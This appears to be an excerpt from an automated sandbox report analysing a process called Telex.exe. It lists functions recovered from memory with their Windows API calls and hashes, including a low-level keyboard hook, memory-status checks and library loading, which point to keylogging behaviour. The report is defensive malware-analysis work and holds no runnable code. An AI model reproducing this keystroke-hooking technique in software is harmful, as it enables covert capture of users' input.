Instruction Fuzzy Hash: 76112671E116188BDB08CFABE9406EEFBF7ABC8310F14C06AD408A7214DB345A168F61

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Telex.exe PID: 6424 Parent PID: 6352 Telex.exeCOMMON

Executed Functions

Function 010E8F48, Relevance: 3.7, APIs: 2, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e64594c5c3db5c9520c9df2cfc76770acaa4038d1de5d12806a49929512c566b
Instruction ID: 82307aa809ba690f56b5bd60decb75954bf516d3d4f6bec87479ce9407e618f9
Opcode Fuzzy Hash: e64594c5c3db5c9520c9df2cfc76770acaa4038d1de5d12806a49929512c566b
Instruction Fuzzy Hash: EA32D130B082448FCB45AB75D9586AE7BF2AF89304F1584AAD149DB7A2DF34CC4ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 010E4988, Relevance: 2.3, APIs: 1, Instructions: 760libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010E5110

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b6da448d52a5b0f31d6817d483a5fc6fd6fa3962d6c55af25756d4d09973786
Instruction ID: b2902aa242781df7c13148c7818a55095e0736eb27d0b26fc635693f6af12aae
Opcode Fuzzy Hash: 9b6da448d52a5b0f31d6817d483a5fc6fd6fa3962d6c55af25756d4d09973786
Instruction Fuzzy Hash: 6B621935E006188FDB64EF79C95469DB7F2AF89304F1089AAD54AAB350EF309E85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 009DDAB8, Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.497921936.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 928082cef437c9e1b52d2552f731cd1317dd7b4d7a00c905522ed67eb67480a8
Instruction ID: cd259ea482eb829e532ceadbaa07de8898f49a05ceb446faec8c5b7b1e5cc428
Opcode Fuzzy Hash: 928082cef437c9e1b52d2552f731cd1317dd7b4d7a00c905522ed67eb67480a8
Instruction Fuzzy Hash: 30F14A30A402098FDB14DFA9C994B9DBBF6BF88304F15C56AE409AF3A5DB74E945CB40

Uniqueness

Uniqueness Score: -1.00%

Function 010E6240, Relevance: 1.9, APIs: 1, Instructions: 391COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E6279

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: b3705b1ca3a99b58cd975a0cda23633283cba781d4500857f426117bfb4c4743
Instruction ID: 0275c758d10f352ae467a5326e56f632c5e73709a2d1c0912dcef9458995ead0
Opcode Fuzzy Hash: b3705b1ca3a99b58cd975a0cda23633283cba781d4500857f426117bfb4c4743
Instruction Fuzzy Hash: D2D10330B002045FEB68EB79D96976E7AE7AFC4710F148829E14AEB390DF359C458B91

Uniqueness

Uniqueness Score: -1.00%

Function 010EAD70, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 010EE4E3

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: dfb098acf7b5db067f40066e823b0eaeba538cab321cecf8729a762075bc53b3
Instruction ID: 65836caf2f738847a6193a9b9a5396115ebd0b24d62f5309228a1912bc4b7f19
Opcode Fuzzy Hash: dfb098acf7b5db067f40066e823b0eaeba538cab321cecf8729a762075bc53b3
Instruction Fuzzy Hash: F12133B19042099FCB14CF9AC848BEEFBF5FB88314F00842AE459B7650CB74A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A16BE0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 02A16C40
GetCurrentThread.KERNEL32 ref: 02A16C7D
GetCurrentProcess.KERNEL32 ref: 02A16CBA
GetCurrentThreadId.KERNEL32 ref: 02A16D13

Memory Dump Source

Source File: 00000001.00000002.502115807.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2be27068d72f8ca883a2f64fa528792e9798c245c95e339133790528b13b058e
Instruction ID: b4d6dbe6e6f0ff0cf3d99b6bbcb1c1d110905a5c9216a343523992a603344cb0
Opcode Fuzzy Hash: 2be27068d72f8ca883a2f64fa528792e9798c245c95e339133790528b13b058e
Instruction Fuzzy Hash: CC5124B0A047488FDB14CFAAD6887DEBBF5EF88314F248459E409A7350DB74A984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 010E2F18, Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E2FB0
SetWindowLongPtrA.USER32 ref: 010E2FEE

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: bffdc60aa017e690e91597fbe25efcf6878d54c41081f556f846b684a43dee21
Instruction ID: 27dca9113ea02e0a32406e541b67b06c241a77744d38924796002ae05019fd76
Opcode Fuzzy Hash: bffdc60aa017e690e91597fbe25efcf6878d54c41081f556f846b684a43dee21
Instruction Fuzzy Hash: 77210734B082458FC741EB78D815AAF7BF1EF8A714B1580BAE149EB752DE349C06C761

Uniqueness

Uniqueness Score: -1.00%

Function 010E8CED, Relevance: 3.1, APIs: 2, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E8D40
SetWindowLongPtrA.USER32 ref: 010E8D7E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 0b84cff09e3316a4f66b10b9d32ff91a12e2ed19355f3d9825f3ee8b83e8175f
Instruction ID: 07e42837ab2fdc70080d36ab0a94d1e72c2013e28d6f5ddd659d43e5a7719f0e
Opcode Fuzzy Hash: 0b84cff09e3316a4f66b10b9d32ff91a12e2ed19355f3d9825f3ee8b83e8175f
Instruction Fuzzy Hash: AF11BE74B092158FCB41EBB8D9455EEBBF1FF89300700846AD58AE7365EB349D06CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 010E8E1E, Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E8E60
SetWindowLongPtrA.USER32 ref: 010E8E9E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 944fc4c396d69bf29511f7afd52eb04fb08036ebb3d5bd529cdca9a2fdbc2047
Instruction ID: a97bb93aeebeaaeee7fdf4694a016895e5adce13c440df3fb4282e4f299815b4
Opcode Fuzzy Hash: 944fc4c396d69bf29511f7afd52eb04fb08036ebb3d5bd529cdca9a2fdbc2047
Instruction Fuzzy Hash: 96119A78F042159F8B41EBB8D855AEE77F1FF88300704846AE14AE7754EB309D068BA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E9FC2, Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010EA000
SetWindowLongPtrA.USER32 ref: 010EA03E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 69261dfd8487b7435aafc938d16a781fa2e227e17e80116a9c22eaf2733069d4
Instruction ID: 8debcbb78c524d44fa56959b3392ec4a08a77f2b56919df296bbee6fc25eadd8
Opcode Fuzzy Hash: 69261dfd8487b7435aafc938d16a781fa2e227e17e80116a9c22eaf2733069d4
Instruction Fuzzy Hash: FD115A78F041148F8B40EFB8D9555AE77F1FF88750710842AE149E7714EB349D468BA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E9EA2, Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E9EE0
SetWindowLongPtrA.USER32 ref: 010E9F1E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 7fcb1d04a38da2f75cef79c9d4bca520360d886d7b46677b1c17747f7d155828
Instruction ID: 282513cfefe8b4df21c927aed7725808135ed5b54547b47a6188beb7d64e8294
Opcode Fuzzy Hash: 7fcb1d04a38da2f75cef79c9d4bca520360d886d7b46677b1c17747f7d155828
Instruction Fuzzy Hash: 73117C78F042159F8B40EBB8E9455EE77F1FF887147108526E14AE7754EF349D068BA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E8D08, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E8D40
SetWindowLongPtrA.USER32 ref: 010E8D7E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 73d256618a437e9f5609ec56a6328b00ae459bb84fb83d67e703524227750822
Instruction ID: b63bcffdde144b8782e1b70fdfb8d6fcd269cc512325c97e9c84adecdfac915c
Opcode Fuzzy Hash: 73d256618a437e9f5609ec56a6328b00ae459bb84fb83d67e703524227750822
Instruction Fuzzy Hash: B6117978B002159F8B40EBB9D8459EEB7F6FF88750700842AE54AE3714EF309D028BA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E9768, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E97A0
SetWindowLongPtrA.USER32 ref: 010E97DE

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: e6d1a5bb2f9692f61a7e4207c67173cba96922716b3393cf1e2380041bf0dbfc
Instruction ID: bd1a0d2e4fb49f3a1c9edb492e50f700b640227fab01c765bc69e9a3c689267d
Opcode Fuzzy Hash: e6d1a5bb2f9692f61a7e4207c67173cba96922716b3393cf1e2380041bf0dbfc
Instruction Fuzzy Hash: E8115778B002189F8B80EFB9D8559EE77F6FB896147008429E14AE3314EF309D068BA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E2F78, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E2FB0
SetWindowLongPtrA.USER32 ref: 010E2FEE

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 36857350bfd96045c46dca63e484526eacf8009a7aecb8260ed829ab32f51bfc
Instruction ID: 71f0a6dd5e416d4b456b6d36723bd0dfa48671fed39cb1080aa107dad5e5758e
Opcode Fuzzy Hash: 36857350bfd96045c46dca63e484526eacf8009a7aecb8260ed829ab32f51bfc
Instruction Fuzzy Hash: DB117978B002159F8B40EBB9E8559EE77F5FF887207108429E54AE7714EF309D028BA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E9FC8, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010EA000
SetWindowLongPtrA.USER32 ref: 010EA03E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: b8032b0ea3f4ca4b1d5e369738f56a7602658fdd3887e733ee69f32d60aabeed
Instruction ID: 011b7b0dc78b384a3a09a2862f5fcfeb82c71eaddce74930a7c43847c323697d
Opcode Fuzzy Hash: b8032b0ea3f4ca4b1d5e369738f56a7602658fdd3887e733ee69f32d60aabeed
Instruction Fuzzy Hash: 49117C78F001149F8B40EFB9D8559AE77F5FB8C7507008429E149E3714EF309D068BA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E8E28, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E8E60
SetWindowLongPtrA.USER32 ref: 010E8E9E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 59e45766b876365a1eaac95f421c5f2ea55a8f6c2f6de9e4b9f6abf810daabb8
Instruction ID: e566fb8ada9fbbd9f4938604a92ee4cc53e694007d152e17091006ffd1c02114
Opcode Fuzzy Hash: 59e45766b876365a1eaac95f421c5f2ea55a8f6c2f6de9e4b9f6abf810daabb8
Instruction Fuzzy Hash: EA117978B002259F8B40EBB9D8459EE77F5FB88710700842AE54AE3754EF30AD068BA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E9EA8, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E9EE0
SetWindowLongPtrA.USER32 ref: 010E9F1E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 2016b6945f8db00c99faf52d1bd8aeaebf2edcf9802464ee226352942c12c9b9
Instruction ID: 0cee539d83f921f4025f7062fbd1de5424d101bd801918c2872199d803b2dd46
Opcode Fuzzy Hash: 2016b6945f8db00c99faf52d1bd8aeaebf2edcf9802464ee226352942c12c9b9
Instruction Fuzzy Hash: 6D117978B002159F8B80EBB9E8449EE77F5FF887147108529E14AE3754EF309D028BA4

Uniqueness

Uniqueness Score: -1.00%

Function 010E2C40, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010E2C81

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 98e91ae8dbcf134fec916a12b96cf0c189154b585899da8a1f018122769e8258
Instruction ID: 6c32fef8f5f16bc2720247b12da603499777a9a5083b201160ca2bf9cd77027f
Opcode Fuzzy Hash: 98e91ae8dbcf134fec916a12b96cf0c189154b585899da8a1f018122769e8258
Instruction Fuzzy Hash: DB618E30A042199FDB14EFB6D9587AEBBF6AF84304F108829E542A73A0DF75D849CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02A152B0, Relevance: 1.7, APIs: 1, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.502115807.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a25e0dcde5853bff8cbdb84796d9b09a3b4d54ad8a9341e8787fc3e8febcc3d
Instruction ID: 436762e6504725fe240f9e2da6e9bdf29056c4d218cc912419898c0ed3b92f2b
Opcode Fuzzy Hash: 9a25e0dcde5853bff8cbdb84796d9b09a3b4d54ad8a9341e8787fc3e8febcc3d
Instruction Fuzzy Hash: 71613671D04248DFCF15CFA9C984ADEBFB2BF89314F14816AE908AB221D7359845CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02A143EE, Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.502115807.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56995580198d8e4b1900b9bdf64f89986e3fbde38cac275c2df22f5cae51b15b
Instruction ID: be48c10fa599739de353dd639449c08eb756c6c5fc94511aba3ea40b5364e1a6
Opcode Fuzzy Hash: 56995580198d8e4b1900b9bdf64f89986e3fbde38cac275c2df22f5cae51b15b
Instruction Fuzzy Hash: 8B5174B5D042498FDB10CFA9D8867DEBBF0FF08328F14855AD859A7241DB34984ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 010EC1F8, Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35c4a47fbf86a446a3dafbcc2aa0d7b0b92bfeffa07449e8168e4a4f67f3e525
Instruction ID: b3d31d704dda5002394dc8ad2848f32f1873eb685820f471a8c1c14a520b8836
Opcode Fuzzy Hash: 35c4a47fbf86a446a3dafbcc2aa0d7b0b92bfeffa07449e8168e4a4f67f3e525
Instruction Fuzzy Hash: B4412731E083898FCB10CFBAC8546DEBFF5AF89210F0585ABC548E7641DB389885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02A15330, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A15442

Memory Dump Source

Source File: 00000001.00000002.502115807.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 430d15332fb334cc2b69c4e1c003229b687b0f8989689c7aea2325b9d0531ada
Instruction ID: c24d8883122252df61e2ae53501945424122769eec1f92d62e9ff99800cd3cc5
Opcode Fuzzy Hash: 430d15332fb334cc2b69c4e1c003229b687b0f8989689c7aea2325b9d0531ada
Instruction Fuzzy Hash: 6D41C2B1D00308DFDB14CF99C984ADEBBB6BF88314F64812AE819AB210D7749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02A16B54, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 02A17D99

Memory Dump Source

Source File: 00000001.00000002.502115807.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 6ccf73994a50d4e2450f002a7cb4fe55bff3bbcd571924a3b29d172763bfa357
Instruction ID: 3d6eee12f6d586da24f4d98b030b12eae6f269078d5bec48ae34df1a4b6f4600
Opcode Fuzzy Hash: 6ccf73994a50d4e2450f002a7cb4fe55bff3bbcd571924a3b29d172763bfa357
Instruction Fuzzy Hash: 8B412CB5A00309CFDB14CF59C988BAAFBF5FB88324F148499D519AB360D734A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 010E2BF3, Relevance: 1.6, APIs: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010E2C81

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1db9efa7d650dddc691fd935557b42739acda2ccba43a87d7988a7dd23478c5a
Instruction ID: dd0e970c255a38991a5564f1c664b8bfd3d6ebe8d0ddd8e2948b4310036c2fdb
Opcode Fuzzy Hash: 1db9efa7d650dddc691fd935557b42739acda2ccba43a87d7988a7dd23478c5a
Instruction Fuzzy Hash: C931A130A093958FCB05DF79D55869D7FF1BF45304F1584AAD084EB396DB35884ACB10

Uniqueness

Uniqueness Score: -1.00%

Function 010E61E0, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E6279

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 97dea40d0e6809b622b9deb8fa41180d8d6b4e3c58c91d3416f32b9c63d95e68
Instruction ID: fd975d437d0cc6b55ddccb915540f85dfc3121c902d9ac758b19297473bcc1c9
Opcode Fuzzy Hash: 97dea40d0e6809b622b9deb8fa41180d8d6b4e3c58c91d3416f32b9c63d95e68
Instruction Fuzzy Hash: 7221F474A093404FC742DB78A9252AE7FF19F86304F0640ABC588DB292EA258D0AC791

Uniqueness

Uniqueness Score: -1.00%

Function 02A1C8E9, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 02A1C972

Memory Dump Source

Source File: 00000001.00000002.502115807.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 7fe85e9886a4b01b87854cb22b805f8f275b7d1afff685eca72df17b7b87a9ce
Instruction ID: 5da4a06cb7c7a87603a1db510a7ea8ce23b3bd7227b28148c616dfdec95de353
Opcode Fuzzy Hash: 7fe85e9886a4b01b87854cb22b805f8f275b7d1afff685eca72df17b7b87a9ce
Instruction Fuzzy Hash: 213138B14043848FEB10DFA8D54839E7FF0FB45324F14805AE089A7301CB395549CF62

Uniqueness

Uniqueness Score: -1.00%

Function 010EE453, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 010EE4E3

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: ad3536ba145bb3f126d3505ee9cf7041067361c7dfc4cc8f6ac44952becab6d7
Instruction ID: 13d4383b7e3d8a61577084a6df2bdd3be015d21c919698c2e233f9a9db4b90c3
Opcode Fuzzy Hash: ad3536ba145bb3f126d3505ee9cf7041067361c7dfc4cc8f6ac44952becab6d7
Instruction Fuzzy Hash: 1F2159759042099FCB10CF9AC8447DEBBF5BF88310F14841AD454A7650CB74A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A16E02, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A16E8F

Memory Dump Source

Source File: 00000001.00000002.502115807.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: cf2e67bbcbd070cfaf8a3ef197c3d71bdc2219feec2337040b786f068010c28c
Instruction ID: 3012a99af86c4631aff9b40c3f21f03cb6a61f2659b63564acce4ea26e2a192f
Opcode Fuzzy Hash: cf2e67bbcbd070cfaf8a3ef197c3d71bdc2219feec2337040b786f068010c28c
Instruction Fuzzy Hash: 3021DFB5900208DFDB10CFA9D985ADEBBF8FF48324F14841AE954B7250D378AA44CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02A16E08, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A16E8F

Memory Dump Source

Source File: 00000001.00000002.502115807.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 502318b0cf143c9d7191c0712a9418c236aef9836e9e4cc0520b2a27787c177b
Instruction ID: e249d045307e621a4a566ad4950fa2729f0749689dacdba2bb260edc57558156
Opcode Fuzzy Hash: 502318b0cf143c9d7191c0712a9418c236aef9836e9e4cc0520b2a27787c177b
Instruction Fuzzy Hash: 1A21B0B59002089FDB10CFAAD984ADEBBF8EB48324F14841AE954A3250D774A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009D6D34, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,009D82F9,00000800), ref: 009D838A

Memory Dump Source

Source File: 00000001.00000002.497921936.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 09ce2e1078ea4223dbe1bb073c4ad7137477e48055d6e13afef87217bc642113
Instruction ID: 0afb5ded0882bf03c3d26186c3cd1ebdf45ce8c039968f9fe11b889e14cf8e73
Opcode Fuzzy Hash: 09ce2e1078ea4223dbe1bb073c4ad7137477e48055d6e13afef87217bc642113
Instruction Fuzzy Hash: 7A1103B69042089FCB10CF9AC444B9EFBF8EB88724F14842AE819B7300C775A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 010EACF4, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,010EC24A), ref: 010EC337

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 97747e69084fa503e18c797bad3d41b9f5f69a768ced5e41201820a16f10e607
Instruction ID: 00883f711b5e6de9044e759c8976503943182202fc4d289fc0f38ce2e120e82d
Opcode Fuzzy Hash: 97747e69084fa503e18c797bad3d41b9f5f69a768ced5e41201820a16f10e607
Instruction Fuzzy Hash: EB1122B1C046199BCB10CF9AC54479EFBF4AB48324F05856AD828B7240D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A1C8F8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 02A1C972

Memory Dump Source

Source File: 00000001.00000002.502115807.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 4bd9903ce190d38a72633bbf82fd55e0bf8479059d4d455457cff3a9435ddc2d
Instruction ID: 949618aa1b0606abe58c44370decf73bdbb80b353c704f58dd8c856442b99b94
Opcode Fuzzy Hash: 4bd9903ce190d38a72633bbf82fd55e0bf8479059d4d455457cff3a9435ddc2d
Instruction Fuzzy Hash: 24116AB1900309CFDB10DFAAD64879EBBF4FB49324F24C42AE445A7604DB396945CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 009D8319, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,009D82F9,00000800), ref: 009D838A

Memory Dump Source

Source File: 00000001.00000002.497921936.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d8a26f437f42f4782ecdc149ac92ff182650273f5c83d6062fdcf24f4ad7535c
Instruction ID: 255f833e2b9d2217bd775e923a1749986da5d2f352936cbed986152b56102093
Opcode Fuzzy Hash: d8a26f437f42f4782ecdc149ac92ff182650273f5c83d6062fdcf24f4ad7535c
Instruction Fuzzy Hash: E01144B6904208CFCB10CFAAD884ADEFBF4EB88720F04842ED419B7200C774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010EC2C8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,010EC24A), ref: 010EC337

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: b34cc5aec9ef18cfdbccd49f132739fe896d750e336b92100fc461f6c091c8af
Instruction ID: 6fc86506c5d432423747249c3c90c08ffebf0a78b83fdbd921bd0b7d25105759
Opcode Fuzzy Hash: b34cc5aec9ef18cfdbccd49f132739fe896d750e336b92100fc461f6c091c8af
Instruction Fuzzy Hash: BB1122B1C042598FCB10CFAAC584BDEFBF4BB48324F15816AD814B7640D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A130DC, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02A143B6

Memory Dump Source

Source File: 00000001.00000002.502115807.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e3c3a704a3ef7871bc19002e33584664c925f958566a136b6995e9a18ff0977d
Instruction ID: 0a7f49449e154d84c432d84b7996346f2e563a46f918059d8313b587940b5966
Opcode Fuzzy Hash: e3c3a704a3ef7871bc19002e33584664c925f958566a136b6995e9a18ff0977d
